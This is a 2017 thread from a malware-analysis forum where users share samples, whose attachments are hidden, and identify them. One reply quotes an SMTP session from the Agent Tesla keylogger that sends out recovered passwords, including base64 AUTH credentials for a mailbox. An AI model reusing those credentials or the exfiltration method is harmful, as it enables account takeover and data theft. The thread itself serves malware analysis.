Malware collection

Forum for analysis and discussion about malware.

Re: Malware collection

Postby ikolor » Sat Apr 08, 2017 1:04 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby ikolor » Sat Apr 08, 2017 6:51 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby ikolor » Mon Apr 17, 2017 10:39 am

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Mon Apr 17, 2017 3:00 pm



This is Agent Tesla keylogger. A sample of the email header sent containing exfiltred data:

EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable


BR,

Antelox
Antelox
 
Posts: 70
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 37

Re: Malware collection

Postby ikolor » Fri Apr 21, 2017 5:08 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Fri Apr 21, 2017 8:16 pm



Looks not malicious to me. This is the last version of a music downloader which can be downloaded from:

http://audiovkontakte.ru/vksaver/vksaver-install.exe


Home page:

http://audiovkontakte.ru


BR,

Antelox
Antelox
 
Posts: 70
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 37

Re: Malware collection

Postby ikolor » Sat Apr 22, 2017 4:30 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

Re: Malware collection

Postby Antelox » Sat Apr 22, 2017 6:38 pm

Antelox
 
Posts: 70
Joined: Sun Mar 21, 2010 10:38 pm
Reputation point: 37

Re: Malware collection

Postby ikolor » Wed Apr 26, 2017 7:49 pm

You do not have the required permissions to view the files attached to this post.
ikolor
 
Posts: 198
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland
Reputation point: 16

PreviousNext

Return to Malware

Who is online

Users browsing this forum: Google [Bot], p4r4n0id and 11 guests